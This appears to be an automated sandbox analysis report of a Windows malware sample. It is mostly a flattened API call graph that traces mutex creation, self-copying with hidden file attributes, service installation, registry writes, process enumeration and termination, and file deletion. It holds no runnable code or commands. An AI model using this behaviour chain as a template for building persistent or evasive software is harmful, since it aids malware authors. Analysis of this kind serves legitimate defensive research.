ed2eb0 GetProcessHeap RtlFreeHeap 9455->9635 9459 ec839b 9460 ec2f90 2 API calls 9459->9460 9461 ec83c0 GetEnvironmentVariableA 9460->9461 9462 ed1bb0 2 API calls 9461->9462 9463 ec83f9 CreateMutexA 9462->9463 9465 ec8480 CreateMutexA CreateMutexA 9463->9465 9467 ec8521 9465->9467 9468 ec868b 9467->9468 9469 ec8587 GetTickCount 9467->9469 9644 ed5200 9468->9644 9470 ec85a5 9469->9470 9473 ec2f90 2 API calls 9470->9473 9472 ec86a4 GetCommandLineA 9474 ec86cb 9472->9474 9476 ec85bd 9473->9476 9475 ec2f90 2 API calls 9474->9475 9477 ec874d 9475->9477 9478 ed1bb0 2 API calls 9476->9478 9480 ed1bb0 2 API calls 9477->9480 9479 ec8622 9478->9479 9479->9468 9481 ec878c 9480->9481 9482 ec9235 GetCommandLineA 9481->9482 9484 ec2f90 2 API calls 9481->9484 9746 eeb990 9482->9746 9486 ec87dd 9484->9486 9487 ed1bb0 2 API calls 9486->9487 9489 ec8812 9487->9489 9488 ec9271 9749 ecd500 lstrlen 9488->9749 9490 ec8842 9489->9490 9492 ec2800 ExitProcess 9489->9492 9495 ec2f90 2 API calls 9490->9495 9492->9490 9493 ec9323 GetModuleFileNameA 9750 eca4e0 lstrlen 9493->9750 9496 ec88ab 9495->9496 9498 ed1bb0 2 API calls 9496->9498 9497 ec93ae 9500 eca4e0 lstrlen 9497->9500 9499 ec88db 9498->9499 9501 ec8926 9499->9501 9503 ec2800 ExitProcess 9499->9503 9502 ec945a 9500->9502 9775 ece430 9501->9775 9505 eca4e0 lstrlen 9502->9505 9503->9501 9520 ec947b 9505->9520 9506 ec8961 9507 ec2f90 2 API calls 9506->9507 9508 ec8978 9507->9508 9512 ed1bb0 2 API calls 9508->9512 9509 ec9764 9821 ee3cf0 9509->9821 9511 ec97b2 9513 ec97d4 9511->9513 9514 ec2800 ExitProcess 9511->9514 9517 ec89cb 9512->9517 9830 ee9b00 9513->9830 9514->9513 9516 ec981d 9518 ef08b0 GetSystemTimeAsFileTime 9516->9518 9535 ec8ab7 9517->9535 9519 ec9830 9518->9519 9924 ee48d0 9519->9924 9520->9509 9521 ec9744 9520->9521 9752 ed8a70 9520->9752 9521->9509 9525 ec956f 9758 ee9580 9525->9758 9527 ec971a 9528 ec2800 ExitProcess 9527->9528 9528->9521 9530 ec958b 9530->9527 9531 ec2f90 2 API calls 9530->9531 9533 ec9651 9531->9533 9532 ec8b61 Sleep 9532->9535 9771 ecd500 lstrlen 9533->9771 9535->9532 9536 ed1530 CreateFileA GetFileTime CloseHandle GetFileSize CloseHandle 9535->9536 9538 ec8c99 Sleep 9535->9538 9555 ec8cd8 9535->9555 9780 ed2120 9535->9780 9791 ef08b0 GetSystemTimeAsFileTime 9535->9791 9536->9535 9537 ec9666 MessageBoxA 9541 ed1bb0 2 API calls 9537->9541 9538->9535 9539 ed2120 5 API calls 9539->9555 9544 ec96ef 9541->9544 9542 ec98a8 9547 ec2f90 2 API calls 9542->9547 9554 ec99ff 9542->9554 9543 ec8de6 9806 ed1530 9543->9806 9772 ec2800 9544->9772 9550 ec99e4 9547->9550 9549 ec8e04 9556 ec8e5c GetModuleFileNameA SetFileAttributesA CopyFileA 9549->9556 9557 ec91a4 9549->9557 9928 ecc540 9550->9928 9551 ec8d8c Sleep 9551->9555 9553 ec9a71 9561 ec9aa3 CloseHandle SetFileAttributesA CopyFileA 9553->9561 9583 ec9d65 9553->9583 9554->9553 9933 edee80 9554->9933 9555->9539 9555->9543 9793 ecbbc0 9555->9793 9559 ec2f90 2 API calls 9556->9559 9816 eefa80 9557->9816 9571 ec8eff 9559->9571 9560 ec9a32 9562 ec9a53 9560->9562 9567 ec2800 ExitProcess 9560->9567 9564 ec9b1a SetFileAttributesA 9561->9564 9565 ec9c78 9561->9565 9944 ec26e0 9562->9944 9568 ec9b73 9564->9568 9569 ec9b5d 9564->9569 9974 ee3110 9565->9974 9567->9562 9577 ec9c2a Sleep 9568->9577 9964 ed7a50 9568->9964 9952 ed0500 OpenSCManagerA 9569->9952 9570 ec9210 9573 ec2800 ExitProcess 9570->9573 9575 ed1bb0 2 API calls 9571->9575 9573->9482 9574 ed2120 5 API calls 9574->9583 9580 ec8f61 9575->9580 9579 eefa80 3 API calls 9577->9579 9579->9565 9588 ec2f90 2 API calls 9580->9588 9599 ec904a 9580->9599 9583->9574 9584 ec9e57 SetFileAttributesA CopyFileA SetFileAttributesA 9583->9584 9586 ecbbc0 8 API calls 9583->9586 9593 ece430 lstrlen 9584->9593 9585 ec2800 ExitProcess 9585->9583 9592 ec9e1a Sleep 9586->9592 9596 ec8fbf 9588->9596 9589 ec913d SetFileAttributesA 9589->9557 9590 ec9113 SetFileAttributesA 9590->9557 9592->9583 9592->9584 9594 ec9ee1 9593->9594 9595 ec2f90 2 API calls 9594->9595 9598 ec9efd 9595->9598 9597 ed1bb0 2 API calls 9596->9597 9597->9599 9600 ec2f90 2 API calls 9598->9600 9599->9589 9599->9590 9601 ec9fbe 9600->9601 9602 ed1bb0 2 API calls 9601->9602 9603 eca039 9602->9603 9978 ed0dc0 9603->9978 9605 eca050 9606 ed1bb0 2 API calls 9605->9606 9607 eca06b 9606->9607 9982 ed1200 9607->9982 9610 ec2f90 2 API calls 9611 eca0ae 9610->9611 9612 ec2f90 2 API calls 9611->9612 9613 eca0c6 9612->9613 10003 ef5820 9613->10003 9615 eca0f2 9616 ed1bb0 2 API calls 9615->9616 9617 eca115 9616->9617 9618 ed1bb0 2 API calls 9617->9618 9619 eca127 9618->9619 9620 eefa80 3 API calls 9619->9620 9621 eca185 9620->9621 9622 eca24e CreateThread 9621->9622 9623 eca2cd 9622->9623 9624 eca2a2 9622->9624 9625 eca310 Sleep 9623->9625 10006 ecc660 StartServiceCtrlDispatcherA 9624->10006 9625->9625 9628 ed1bd0 9627->9628 9629 ed2eb0 2 API calls 9628->9629 9630 ec7a18 9629->9630 9631 ec2f90 9630->9631 9632 ec2feb 9631->9632 10007 ece2c0 9632->10007 9634 ec3034 9634->9395 9636 ec8388 9635->9636 9637 ef50e0 9636->9637 9638 ef5186 GetSystemTime 9637->9638 9639 ef5172 9637->9639 9640 ef51be 9638->9640 9639->9638 9641 ef08b0 GetSystemTimeAsFileTime 9640->9641 9642 ef52a7 GetTickCount 9641->9642 9643 ef52d4 9642->9643 9643->9459 9645 ed521d 9644->9645 9646 ed52b2 GetVersionExA 9645->9646 10010 ecb7a0 AllocateAndInitializeSid 9646->10010 9652 ec2f90 2 API calls 9653 ed5652 9652->9653 10030 ecd530 9653->10030 9656 ed1bb0 2 API calls 9661 ed5692 9656->9661 9657 ed5357 9658 ed5496 CreateDirectoryA 9657->9658 9659 ec2f90 2 API calls 9658->9659 9660 ed54bb 9659->9660 9662 ed1bb0 2 API calls 9660->9662 10034 ed1d90 9661->10034 9664 ed550a 9662->9664 9664->9652 9665 ed56cb 9666 ed575d 9665->9666 9667 ed56d6 DeleteFileA RemoveDirectoryA 9665->9667 9668 ecf0d0 6 API calls 9666->9668 9667->9666 9669 ed5776 9668->9669 9670 ed581e CreateDirectoryA 9669->9670 9671 ed585b 9670->9671 9672 ece430 lstrlen 9671->9672 9673 ed58cb CreateDirectoryA 9672->9673 9674 ed5917 9673->9674 9675 ec2f90 2 API calls 9674->9675 9676 ed592d 9675->9676 9677 ec2f90 2 API calls 9676->9677 9678 ed59e9 9677->9678 9679 ed1bb0 2 API calls 9678->9679 9680 ed5a07 9679->9680 9681 ecd530 9 API calls 9680->9681 9682 ed5a77 9681->9682 9683 ed1bb0 2 API calls 9682->9683 9684 ed5aaa 9683->9684 9685 ed1d90 5 API calls 9684->9685 9686 ed5ad7 9685->9686 9687 ed64f5 9686->9687 9688 ed5b07 9686->9688 9689 ed5c42 9686->9689 9692 ece430 lstrlen 9687->9692 9691 ec2f90 2 API calls 9688->9691 9690 ec2f90 2 API calls 9689->9690 9693 ed5c61 9690->9693 9694 ed5b2d 9691->9694 9695 ed6549 SetFileAttributesA 9692->9695 9696 ef5820 wvsprintfA 9693->9696 9697 ef5820 wvsprintfA 9694->9697 9703 ed657e 9695->9703 9698 ed5c87 9696->9698 9699 ed5b5a 9697->9699 9700 ed1bb0 2 API calls 9698->9700 9701 ed1bb0 2 API calls 9699->9701 9702 ed5b9f 9700->9702 9701->9702 9704 ed5bea 9702->9704 9703->9472 9705 ed5d53 CreateDirectoryA 9704->9705 9706 ed5d9a 9705->9706 9707 ece430 lstrlen 9706->9707 9708 ed5e4f CreateDirectoryA 9707->9708 9709 ec2f90 2 API calls 9708->9709 9710 ed5e9e 9709->9710 9711 ec2f90 2 API calls 9710->9711 9712 ed5f4c 9711->9712 9713 ed1bb0 2 API calls 9712->9713 9714 ed5f68 9713->9714 9715 ecd530 9 API calls 9714->9715 9716 ed5f86 9715->9716 9717 ed1bb0 2 API calls 9716->9717 9718 ed5fcf 9717->9718 9719 ed1d90 5 API calls 9718->9719 9720 ed6002 9719->9720 9721 ed600d GetTempPathA 9720->9721 9722 ed6485 9720->9722 10050 ecd500 lstrlen 9721->10050 9722->9687 9724 ed604f 9725 ece430 lstrlen 9724->9725 9726 ed61cb CreateDirectoryA 9725->9726 9728 ed6219 9726->9728 9729 ec2f90 2 API calls 9728->9729 9730 ed6237 9729->9730 9731 ec2f90 2 API calls 9730->9731 9732 ed62be 9731->9732 9733 ed1bb0 2 API calls 9732->9733 9734 ed6302 9733->9734 9735 ecd530 9 API calls 9734->9735 9736 ed6360 9735->9736 9737 ed1bb0 2 API calls 9736->9737 9738 ed6372 9737->9738 9739 ed1d90 5 API calls 9738->9739 9740 ed63b5 9739->9740 9740->9722 9741 ed63c0 GetTempPathA 9740->9741 9742 ed63ff 9741->9742 9743 ec2f90 2 API calls 9742->9743 9744 ed642d 9743->9744 9745 ed1bb0 2 API calls 9744->9745 9745->9722 10089 ecd500 lstrlen 9746->10089 9748 eeb9c3 9748->9488 9749->9493 9751 eca53c 9750->9751 9751->9497 9753 ed8a95 9752->9753 10090 ecca40 9753->10090 9755 ed8b1d 9756 eefa80 3 API calls 9755->9756 9757 ed8b65 9756->9757 9757->9525 9759 ee9902 9758->9759 9760 ee95a9 9758->9760 9759->9530 10128 ecd500 lstrlen 9760->10128 9762 ee965d Sleep 9763 ee96b9 9762->9763 9764 ec2f90 2 API calls 9763->9764 9765 ee96e9 9764->9765 9766 ed1bb0 2 API calls 9765->9766 9767 ee979d FindFirstFileA 9766->9767 9768 ee97d6 9767->9768 9768->9759 9769 ee9877 DeleteFileA FindNextFileA 9768->9769 9769->9768 9770 ee98d9 FindClose 9769->9770 9770->9759 9771->9537 9773 ec281d 9772->9773 9774 ec283e ExitProcess 9773->9774 9776 ee48d0 lstrlen 9775->9776 9777 ece451 9776->9777 9778 ece480 9777->9778 10129 ecd500 lstrlen 9777->10129 9778->9506 9781 ed218c 9780->9781 9782 ed2196 CreateToolhelp32Snapshot 9780->9782 9781->9782 9783 ed21fe Process32First 9782->9783 9784 ed2450 9782->9784 9786 ed240d CloseHandle 9783->9786 9788 ed227a 9783->9788 9784->9535 9786->9784 9787 eca4e0 lstrlen 9787->9788 9788->9787 9789 ed2346 Process32Next 9788->9789 9790 ed239c 9788->9790 9789->9788 9789->9790 9790->9786 9792 ef0958 __aulldiv 9791->9792 9792->9535 9794 ecbbe1 CreateToolhelp32Snapshot 9793->9794 9796 ecbcbb Process32First 9794->9796 9798 ecbf47 9794->9798 9797 ecbf1a CloseHandle 9796->9797 9803 ecbd05 9796->9803 9797->9798 9798->9551 9799 eca4e0 lstrlen 9799->9803 9800 ecbdbb OpenProcess 9801 ecbe02 TerminateProcess 9800->9801 9800->9803 9801->9803 9804 ecbe67 CloseHandle 9801->9804 9802 ecbedd Process32Next 9802->9803 9805 ecbf19 9802->9805 9803->9799 9803->9800 9803->9802 9803->9804 9804->9803 9805->9797 9807 ed157f CreateFileA 9806->9807 9808 ed1561 9806->9808 9809 ed1611 9807->9809 9808->9807 9810 ed1657 9809->9810 9811 ed1673 GetFileTime 9809->9811 9810->9549 9812 ed1694 CloseHandle 9811->9812 9813 ed16bf __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 9811->9813 9812->9549 9814 ed1771 GetFileSize CloseHandle 9813->9814 9815 ed17be 9814->9815 9815->9549 9817 eefaaa 9816->9817 9818 eefb6a CreateProcessA 9817->9818 9819 eefc8f 9818->9819 9820 eefbff CloseHandle CloseHandle 9818->9820 9819->9570 9820->9570 9822 ee3d35 9821->9822 9823 ece430 lstrlen 9822->9823 9824 ee3d66 9823->9824 9825 ec2f90 2 API calls 9824->9825 9826 ee3d82 9825->9826 9827 ed1bb0 2 API calls 9826->9827 9828 ee3dd1 CreateFileA 9827->9828 9829 ee3e32 9828->9829 9829->9511 9831 ee9b93 9830->9831 9832 ee9c40 GetComputerNameA 9831->9832 9833 ee9c53 9832->9833 9834 ee9cbb 9832->9834 9835 ec2f90 2 API calls 9833->9835 9836 ec2f90 2 API calls 9834->9836 9837 ee9c7e 9835->9837 9838 ee9d55 9836->9838 9839 ed1bb0 2 API calls 9837->9839 9840 ed1bb0 2 API calls 9838->9840 9839->9834 9841 ee9db1 9840->9841 9842 ecd530 9 API calls 9841->9842 9843 ee9dd5 9842->9843 10130 ed2c30 9843->10130 9845 ee9e08 10133 eda930 9845->10133 9847 ee9f23 10172 ecd500 lstrlen 9847->10172 9849 ee9f65 10173 ef01a0 9849->10173 9853 ee9fcf 9854 ed2c30 8 API calls 9853->9854 9855 ee9ffe 9854->9855 9856 ef01a0 9 API calls 9855->9856 9857 eea0a3 9856->9857 9858 ef1050 8 API calls 9857->9858 9859 eea0b2 9858->9859 9860 ed2c30 8 API calls 9859->9860 9861 eea0dd 9860->9861 9862 ef01a0 9 API calls 9861->9862 9863 eea118 9862->9863 9864 ef1050 8 API calls 9863->9864 9865 eea127 9864->9865 9866 ed2c30 8 API calls 9865->9866 9867 eea16c 9866->9867 9868 ef01a0 9 API calls 9867->9868 9869 eea18b 9868->9869 9870 ef1050 8 API calls 9869->9870 9871 eea197 9870->9871 9872 ed2c30 8 API calls 9871->9872 9873 eea1e1 9872->9873 9874 ef01a0 9 API calls 9873->9874 9875 eea204 9874->9875 9876 ef1050 8 API calls 9875->9876 9877 eea213 9876->9877 9878 ed2c30 8 API calls 9877->9878 9879 eea248 9878->9879 9880 ec2f90 2 API calls 9879->9880 9881 eea280 9880->9881 9882 ef01a0 9 API calls 9881->9882 9883 eea2bf 9882->9883 9884 ef1050 8 API calls 9883->9884 9885 eea2ce 9884->9885 9886 ed1bb0 2 API calls 9885->9886 9887 eea2f5 9886->9887 9888 ed2c30 8 API calls 9887->9888 9889 eea31b 9888->9889 9890 ef01a0 9 API calls 9889->9890 9891 eea347 9890->9891 9892 ef1050 8 API calls 9891->9892 9893 eea353 9892->9893 9894 ed2c30 8 API calls 9893->9894 9895 eea391 9894->9895 9896 ef01a0 9 API calls 9895->9896 9897 eea3aa 9896->9897 9898 ef1050 8 API calls 9897->9898 9899 eea3b9 9898->9899 9900 ed2c30 8 API calls 9899->9900 9901 eea402 9900->9901 10180 ed2f60 9901->10180 9905 eea465 9906 ef01a0 9 API calls 9905->9906 9907 eea471 9906->9907 9908 ef1050 8 API calls 9907->9908 9909 eea480 9908->9909 9910 ed2c30 8 API calls 9909->9910 9911 eea4d1 9910->9911 9912 ef01a0 9 API calls 9911->9912 9913 eea502 9912->9913 9914 ef1050 8 API calls 9913->9914 9915 eea511 9914->9915 10189 ed97b0 9915->10189 9917 eea54f 10216 edd990 9917->10216 9919 eea575 10219 ed4290 9919->10219 9921 eea5b3 10223 ee0480 9921->10223 9923 eea63b 9923->9516 9925 ee4926 9924->9925 10274 ecd500 lstrlen 9925->10274 9927 ee4948 9927->9542 9929 ee3110 WaitForSingleObject 9928->9929 9930 ecc562 9929->9930 9931 ec2800 ExitProcess 9930->9931 9932 ecc578 9931->9932 9932->9554 9934 edee9d 9933->9934 9935 ece430 lstrlen 9934->9935 9936 edeef8 9935->9936 9937 ec2f90 2 API calls 9936->9937 9938 edef29 9936->9938 9939 edef91 9937->9939 9938->9560 9940 ed1bb0 2 API calls 9939->9940 9941 edf001 9940->9941 10275 ecd000 9941->10275 9943 edf020 9943->9560 9945 ef08b0 GetSystemTimeAsFileTime 9944->9945 9946 ec2703 9945->9946 9947 ec27c8 9946->9947 9948 ef08b0 GetSystemTimeAsFileTime 9946->9948 9947->9553 9950 ec2751 9948->9950 9949 ec2770 Sleep 9949->9950 9950->9947 9950->9949 9951 ef08b0 GetSystemTimeAsFileTime 9950->9951 9951->9950 9953 ed055f CreateServiceA 9952->9953 9954 ed07be 9952->9954 9955 ed05be 9953->9955 9954->9568 9956 ed06bc OpenServiceA 9955->9956 9957 ed05d8 ChangeServiceConfig2A StartServiceA 9955->9957 9961 ed0716 StartServiceA CloseServiceHandle 9956->9961 9962 ed075e CloseServiceHandle 9956->9962 9958 ed067e CloseServiceHandle 9957->9958 9958->9962 9961->9962 9962->9954 9965 ed7ab7 9964->9965 9966 ec2f90 2 API calls 9965->9966 9967 ed7b71 9966->9967 9968 ed1bb0 2 API calls 9967->9968 9969 ed7bcb 9968->9969 9970 ed7cc0 RegCloseKey 9969->9970 10293 ecd500 lstrlen 9969->10293 9971 ec9c15 9970->9971 9971->9577 9973 ed7c87 RegSetValueExA 9973->9970 9975 ee312e WaitForSingleObject 9974->9975 9977 ec9d15 9975->9977 9977->9585 9979 ed0de7 9978->9979 9980 ed0f4e CreateFileA 9979->9980 9981 ed0f80 9980->9981 9981->9605 9983 ed126b 9982->9983 9984 ed1254 9982->9984 9985 ec2f90 2 API calls 9983->9985 9986 ed0920 8 API calls 9984->9986 9987 ed12b3 9985->9987 9986->9983 9988 ed0dc0 CreateFileA 9987->9988 9989 ed12cd 9988->9989 9990 ed1bb0 2 API calls 9989->9990 9991 ed131f 9990->9991 9992 ed1378 Sleep 9991->9992 9995 ed1420 9991->9995 9993 ec2f90 2 API calls 9992->9993 9996 ed13b7 9993->9996 9994 eca090 9994->9610 9995->9994 10294 ed10e0 9995->10294 9998 ed0dc0 CreateFileA 9996->9998 9999 ed13cc 9998->9999 10002 ed1bb0 2 API calls 9999->10002 10000 ed147c 10299 ef5370 CloseHandle 10000->10299 10002->9995 10004 ef587d wvsprintfA 10003->10004 10005 ef586d 10003->10005 10004->9615 10005->10004 10006->9623 10008 ece2e4 10007->10008 10009 ece2f2 GetProcessHeap RtlAllocateHeap 10007->10009 10008->10009 10009->9634 10011 ecb84e 10010->10011 10012 ecb86a CheckTokenMembership 10011->10012 10013 ecb887 10011->10013 10012->10013 10014 ecfbc0 10013->10014 10015 ecfc3c 10014->10015 10016 ec2f90 2 API calls 10015->10016 10017 ecfc76 GetProcAddress 10016->10017 10018 ed1bb0 2 API calls 10017->10018 10019 ecfcb4 10018->10019 10020 ecfcc5 GetCurrentProcess 10019->10020 10021 ecfcdc 10019->10021 10020->10021 10021->9664 10022 ecf0d0 GetWindowsDirectoryA 10021->10022 10023 ecf122 10022->10023 10024 ec2f90 2 API calls 10023->10024 10025 ecf1d3 10023->10025 10026 ecf170 10024->10026 10025->9657 10027 ed1bb0 2 API calls 10026->10027 10028 ecf1bb 10027->10028 10051 ecd500 lstrlen 10028->10051 10031 ecd54a 10030->10031 10052 ecfa50 10031->10052 10035 ed1d9d 10034->10035 10036 ee3110 WaitForSingleObject 10035->10036 10037 ed1e0c 10036->10037 10038 ed1e4c CreateFileA 10037->10038 10039 ed1e23 10037->10039 10041 ed1e93 10038->10041 10045 ed1ed1 10038->10045 10085 eefcc0 10039->10085 10043 eefcc0 ReleaseMutex 10041->10043 10044 ed1eaf 10043->10044 10044->9665 10046 ed1fe8 WriteFile 10045->10046 10046->10045 10047 ed2069 CloseHandle 10046->10047 10048 eefcc0 ReleaseMutex 10047->10048 10049 ed20a1 10048->10049 10049->9665 10050->9724 10051->10025 10053 ecfa7e 10052->10053 10058 ecd500 lstrlen 10053->10058 10055 ecfae4 10059 ed2df0 10055->10059 10057 ecd55f 10057->9656 10058->10055 10062 edbff0 10059->10062 10061 ed2e3e 10061->10057 10063 edc006 10062->10063 10065 edc00d 10063->10065 10067 ee3f00 10063->10067 10065->10061 10066 edc04f 10066->10061 10068 ee3f30 10067->10068 10069 ee3f46 10068->10069 10071 ed0110 10068->10071 10069->10066 10072 ed0128 10071->10072 10073 ed038a 10072->10073 10074 ed0266 10072->10074 10077 ed0367 10072->10077 10080 ed68d0 10073->10080 10076 ece2c0 2 API calls 10074->10076 10078 ed0276 10076->10078 10077->10069 10079 ed2eb0 2 API calls 10078->10079 10079->10077 10081 ed6901 10080->10081 10082 ed6966 GetProcessHeap HeapAlloc 10081->10082 10083 ed6926 GetProcessHeap RtlReAllocateHeap 10081->10083 10082->10077 10083->10077 10086 eefcdb 10085->10086 10087 eefce5 ReleaseMutex 10085->10087 10086->10087 10088 ed1e39 10087->10088 10088->9665 10089->9748 10091 eccaa0 10090->10091 10092 eccae7 CreateFileA 10091->10092 10093 eccb3d ReadFile 10092->10093 10097 eccf5d 10092->10097 10094 eccbbc FindCloseChangeNotification 10093->10094 10095 eccb79 10093->10095 10119 ed2a20 10094->10119 10095->10094 10097->9755 10098 eccbf5 GetTickCount 10121 ef1520 10098->10121 10100 eccc2a 10125 ecd500 lstrlen 10100->10125 10102 eccc81 10103 ec2f90 2 API calls 10102->10103 10104 ecccd1 10103->10104 10105 ed1bb0 2 API calls 10104->10105 10106 eccd00 10105->10106 10107 eccddc CreateFileA 10106->10107 10109 ec2f90 2 API calls 10106->10109 10107->10097 10110 eccef5 WriteFile 10107->10110 10113 eccd54 10109->10113 10111 eccf46 CloseHandle 10110->10111 10112 eccf32 10110->10112 10111->10097 10112->10111 10126 ecd500 lstrlen 10113->10126 10115 eccd6c 10116 ef5820 wvsprintfA 10115->10116 10117 eccd77 10116->10117 10118 ed1bb0 2 API calls 10117->10118 10118->10107 10120 ed2a3b 10119->10120 10120->10098 10122 ef1546 10121->10122 10127 ecd500 lstrlen 10122->10127 10124 ef15bf 10124->10100 10125->10102 10126->10115 10127->10124 10128->9762 10129->9778 10131 ed4290 8 API calls 10130->10131 10132 ed2c4d 10131->10132 10132->9845 10134 eda998 10133->10134 10135 ec2f90 2 API calls 10134->10135 10136 edaa6c 10135->10136 10137 ed1bb0 2 API calls 10136->10137 10138 edaab7 GetProcessHeap 10137->10138 10139 edaaeb 10138->10139 10140 edab54 10138->10140 10139->9847 10141 ec2f90 2 API calls 10140->10141 10142 edab6a LoadLibraryA 10141->10142 10143 edabb1 10142->10143 10144 ed1bb0 2 API calls 10143->10144 10146 edabcb 10144->10146 10145 edabf6 10145->9847 10146->10145 10147 ec2f90 2 API calls 10146->10147 10148 edac99 GetProcAddress 10147->10148 10149 ed1bb0 2 API calls 10148->10149 10150 edacd9 10149->10150 10151 edad28 HeapAlloc 10150->10151 10152 edacf0 FreeLibrary 10150->10152 10153 edad78 10151->10153 10152->9847 10154 edadfa 10153->10154 10155 edada4 FreeLibrary 10153->10155 10157 edae30 HeapFree 10154->10157 10162 edaf24 10154->10162 10155->9847 10158 edae8a HeapAlloc 10157->10158 10159 edae77 10157->10159 10160 edaeaa FreeLibrary 10158->10160 10158->10162 10159->10158 10161 edaedf 10160->10161 10161->9847 10164 ec2f90 2 API calls 10162->10164 10171 edb22b 10162->10171 10163 edb6ad HeapFree FreeLibrary 10163->9847 10165 edaffe 10164->10165 10166 ed1bb0 2 API calls 10165->10166 10167 edb074 10166->10167 10168 ec2f90 2 API calls 10167->10168 10167->10171 10169 edb249 10168->10169 10170 ed1bb0 2 API calls 10169->10170 10170->10171 10171->10163 10172->9849 10228 eda810 10173->10228 10176 ef1050 10177 ef1071 10176->10177 10178 ed4290 8 API calls 10177->10178 10179 ef107f 10178->10179 10179->9853 10181 ed2f95 10180->10181 10182 ec2f90 2 API calls 10181->10182 10183 ed2fd0 10182->10183 10184 ed1bb0 2 API calls 10183->10184 10185 ed3030 10184->10185 10186 ed6600 10185->10186 10235 ecd500 lstrlen 10186->10235 10188 ed6655 10188->9905 10190 ed97e8 10189->10190 10191 ec2f90 2 API calls 10190->10191 10192 ed987a 10191->10192 10193 ec2f90 2 API calls 10192->10193 10194 ed98a9 10193->10194 10195 ec2f90 2 API calls 10194->10195 10196 ed98d7 10195->10196 10197 ed1bb0 2 API calls 10196->10197 10198 ed9917 10197->10198 10199 ec2f90 2 API calls 10198->10199 10200 ed9955 10199->10200 10201 ed1bb0 2 API calls 10200->10201 10202 ed99ab 10201->10202 10203 ed1bb0 2 API calls 10202->10203 10207 ed9a2b 10203->10207 10204 eda5a1 10205 ed1bb0 2 API calls 10204->10205 10208 eda606 10205->10208 10211 ec1ca0 9 API calls 10207->10211 10214 ed9f98 10207->10214 10236 ed6810 10207->10236 10208->9917 10209 ed6810 8 API calls 10209->10214 10210 eda428 10210->10204 10212 ed6810 8 API calls 10210->10212 10239 ec1ca0 10210->10239 10211->10207 10212->10210 10214->10204 10214->10209 10214->10210 10215 ec1ca0 9 API calls 10214->10215 10215->10214 10217 edbff0 8 API calls 10216->10217 10218 edd997 10217->10218 10218->9919 10220 ed42e3 10219->10220 10221 edbff0 8 API calls 10220->10221 10222 ed432f 10221->10222 10222->9921 10250 ee4450 10223->10250 10225 ee04ab 10226 ed4290 8 API calls 10225->10226 10227 ee0589 10225->10227 10226->10227 10227->9923 10229 eda81c 10228->10229 10234 ecd500 lstrlen 10229->10234 10231 eda8a0 10232 ed2df0 8 API calls 10231->10232 10233 eda8ac 10232->10233 10233->10176 10234->10231 10235->10188 10245 ed1c30 10236->10245 10238 ed681e 10238->10207 10240 ecd5d0 10239->10240 10249 ecd500 lstrlen 10240->10249 10242 ecd630 10243 ed4290 8 API calls 10242->10243 10244 ecd63c 10243->10244 10244->10210 10246 ed1c67 10245->10246 10247 edbff0 8 API calls 10246->10247 10248 ed1c89 10247->10248 10248->10238 10249->10242 10255 ef00f0 10250->10255 10252 ee4475 10252->10225 10254 ee457d 10252->10254 10259 ed0920 10252->10259 10254->10225 10256 ef0149 10255->10256 10257 ef010b 10255->10257 10256->10252 10258 edd990 8 API calls 10257->10258 10258->10256 10260 ed0945 10259->10260 10261 ee3110 WaitForSingleObject 10260->10261 10262 ed0a18 10261->10262 10263 ec2f90 2 API calls 10262->10263 10273 ed0b2c 10262->10273 10264 ed0a68 GetProcAddress 10263->10264 10265 ed0aa7 10264->10265 10266 ec2f90 2 API calls 10265->10266 10268 ed0ad3 10266->10268 10267 eefcc0 ReleaseMutex 10270 ed0d8e 10267->10270 10269 ed1bb0 2 API calls 10268->10269 10271 ed0ae7 GetProcAddress 10269->10271 10270->10252 10272 ed1bb0 2 API calls 10271->10272 10272->10273 10273->10267 10274->9927 10276 ecd00d 10275->10276 10277 edd990 8 API calls 10276->10277 10278 ecd0dd 10277->10278 10279 ee3110 WaitForSingleObject 10278->10279 10280 ecd0f2 CreateFileA 10279->10280 10281 ecd140 10280->10281 10282 ecd131 10280->10282 10285 ecd1b9 ReadFile 10281->10285 10286 ed0110 8 API calls 10281->10286 10287 ecd3e3 CloseHandle 10281->10287 10288 ed4290 8 API calls 10281->10288 10289 ecd294 CloseHandle 10281->10289 10283 eefcc0 ReleaseMutex 10282->10283 10284 ecd410 10283->10284 10284->9943 10285->10281 10286->10281 10287->10282 10288->10281 10291 eefcc0 ReleaseMutex 10289->10291 10292 ecd322 10291->10292 10292->9943 10293->9973 10295 ed1115 10294->10295 10296 ed1126 10294->10296 10295->10000 10297 ed114e WriteFile 10296->10297 10298 ed1137 10296->10298 10297->10000 10298->10000 10300 ef53d4 10299->10300 10300->9994 11402 eca307 11403 eca310 Sleep 11402->11403 11403->11403 10319 ecc980 10320 ecc99d 10319->10320 10321 ece2c0 2 API calls 10320->10321 10322 ecc9f6 10321->10322 10584 ec1080 10585 ec108b 10584->10585 10588 ee0b00 10585->10588 10587 ec1117 10589 ee3f00 8 API calls 10588->10589 10590 ee0b1c 10589->10590 10590->10587 10591 ec2080 10592 ec2097 10591->10592 10593 ee0790 4 API calls 10592->10593 10594 ec21e4 10593->10594 11404 ed1500 11407 edee60 11404->11407 11408 edb720 lstrlen 11407->11408 11409 ed150f 11408->11409 11349 ee5f98 11350 ee5706 11349->11350 11351 ee86f1 11350->11351 11353 ecd500 lstrlen 11350->11353 11353->11350 11140 ed6c10 11141 ed6c21 RegisterServiceCtrlHandlerA 11140->11141 11143 ed6fc8 11141->11143 11144 ed6da2 SetServiceStatus CreateEventA 11141->11144 11145 ed6e58 SetServiceStatus 11144->11145 11146 ed6e3b 11144->11146 11147 ed6ea0 WaitForSingleObject 11145->11147 11146->11145 11147->11147 11148 ed6ecb 11147->11148 11149 ee3110 WaitForSingleObject 11148->11149 11150 ed6eff SetServiceStatus CloseHandle SetServiceStatus 11149->11150 11150->11143 11151 ece211 11152 ece240 ExitProcess 11151->11152 11357 ee4590 11358 ee45bd 11357->11358 11359 ee0610 2 API calls 11358->11359 11360 ee45c2 11359->11360 11361 eefde0 3 API calls 11360->11361 11362 ee45ee 11361->11362 11363 ee4672 ExitProcess 11362->11363

                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                            Function 00EC7A04 Relevance: 60.1, APIs: 28, Strings: 5, Instructions: 2326sleepfilesynchronizationCOMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(00000000,C:\Users\user,00000104), ref: 00EC83DA
                                                                                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 00EC8448
                                                                                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,00000000), ref: 00EC84DC
